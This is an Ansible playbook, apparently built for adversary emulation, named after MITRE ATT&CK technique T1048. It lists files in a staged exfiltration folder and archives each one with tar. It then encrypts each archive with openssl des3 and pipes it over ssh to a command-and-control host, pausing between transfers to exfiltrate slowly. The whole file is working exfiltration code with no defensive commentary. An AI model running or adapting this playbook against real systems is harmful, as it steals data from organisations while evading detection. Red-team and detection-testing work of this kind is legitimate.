
# Playbook-T1048-Chunk
- name : Exfiltration Over Alternative Protocol in chunk over time
  hosts: linux
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: Ansible check directory exists example.
      tags: always
      stat:
        path: "{{ exfiltration_folder }}"
      register: exfil_check
    - name: fail if exfil folder does not exist
      tags: always
      fail: msg="No Exfiltration folder, please run another playbook before this one"
      when: exfil_check.stat.exists == False
      
    - name: Grab files names form exfiltration_folder
      tags: always
      shell: "find . -maxdepth 1 -type f | cut -d'/' -f2"
      args:
        chdir: "{{ exfiltration_folder }}"
      register: exfil_files_list
    - name: Debug test
      tags: always 
      debug:
        msg="{{ exfil_files_list.stdout_lines }}"
    - name: Exfil over SSH
      tags: always
      shell: |
        tar czpf - {{ item }} | openssl des3 -salt -k {{ password_encryption }} | ssh {{ cnc_fqdn }} 'cat > {{ exfiltration_file }}-{{ item }}.tar.gz.enc'
        sleep {{ exfil_delay }}
      with_items: "{{ exfil_files_list.stdout_lines }}"
      args:
        chdir: "{{ exfiltration_folder }}"
